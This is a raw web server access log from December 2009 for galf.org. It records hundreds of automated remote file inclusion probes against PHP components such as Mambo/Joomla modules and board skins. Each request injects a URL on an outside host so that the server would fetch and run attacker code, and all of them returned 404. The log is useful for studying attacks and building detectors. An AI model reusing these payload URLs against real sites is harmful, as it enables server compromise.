68.146.96.242 - - [21/Dec/2009:02:01:16 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:01:17 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:01:25 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:01:25 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:01:25 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:01:45 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:01:45 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:01:46 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:01:51 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:01:51 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:01:51 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:02:25 -0800] "GET /logs/access_090525.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:26 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:26 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:26 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [21/Dec/2009:02:02:27 -0800] "GET /logs/access_091116.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:02:38 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:02:39 -0800] "GET /logs/access_090921.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:02:39 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:41 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:41 -0800] "GET /logs/access_090706.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:41 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:42 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:45 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:02:45 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:03:03 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:03:03 -0800] "GET /logs/access_090706.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:03:03 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:03:37 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:03:37 -0800] "GET /logs/access.log/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:03:37 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:04:31 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:04:31 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:04:31 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:05:00 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:05:00 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:05:03 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:05:17 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:05:36 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:05:45 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:05:55 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:06:26 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:06:30 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:14 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:15 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:15 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:21 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:21 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:21 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:58 -0800] "GET /logs/access_090706.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:58 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:07:58 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:08:01 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:08:01 -0800] "GET /logs/access_090706.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:08:01 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:09:40 -0800] "GET /logs/access.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:09:51 -0800] "GET /logs/access.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.116.0.130 - - [21/Dec/2009:02:09:54 -0800] "GET /logs/access_090921.log//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.116.0.130 - - [21/Dec/2009:02:09:54 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.116.0.130 - - [21/Dec/2009:02:09:54 -0800] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:10:23 -0800] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:10:23 -0800] "GET /logs/access.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:10:23 -0800] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:12:14 -0800] "GET /logs/access.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:12:16 -0800] "GET /logs/access_091109.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:02:12:18 -0800] "GET /logs/access_090921.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [21/Dec/2009:02:12:21 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.18.191.237 - - [21/Dec/2009:02:12:57 -0800] "GET /logs/access_091012.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.191.237 - - [21/Dec/2009:02:13:39 -0800] "GET /logs/access_091012.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://gimpindustries.net/phplive/setup/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:13:51 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:13:51 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:13:51 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:14:14 -0800] "GET /logs/access_091012.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:14:57 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:14:57 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:14:57 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:15:22 -0800] "GET /logs/access_090921.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:15:29 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:15:30 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:15:30 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.146.96.242 - - [21/Dec/2009:02:15:45 -0800] "GET /logs/access_091012.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.146.96.242 - - [21/Dec/2009:02:15:59 -0800] "GET /logs/access_091012.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://soncanada.com/zBoard/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:16:19 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:16:19 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:16:19 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:16:30 -0800] "GET /logs/access_091130.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:17:00 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:17:00 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:17:00 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [21/Dec/2009:02:17:01 -0800] "GET /logs/access_091130.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:45 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:45 -0800] "GET /logs/access_090831.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:45 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:45 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /logs/access_090831.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /logs/access_090831.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /logs/access_090831.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:47 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:49 -0800] "GET /logs/access_090831.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:49 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:49 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:50 -0800] "GET /logs/access_090831.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:50 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:50 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:17:50 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:18:04 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:18:04 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [21/Dec/2009:02:18:04 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:18:05 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:18:10 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [21/Dec/2009:02:18:10 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
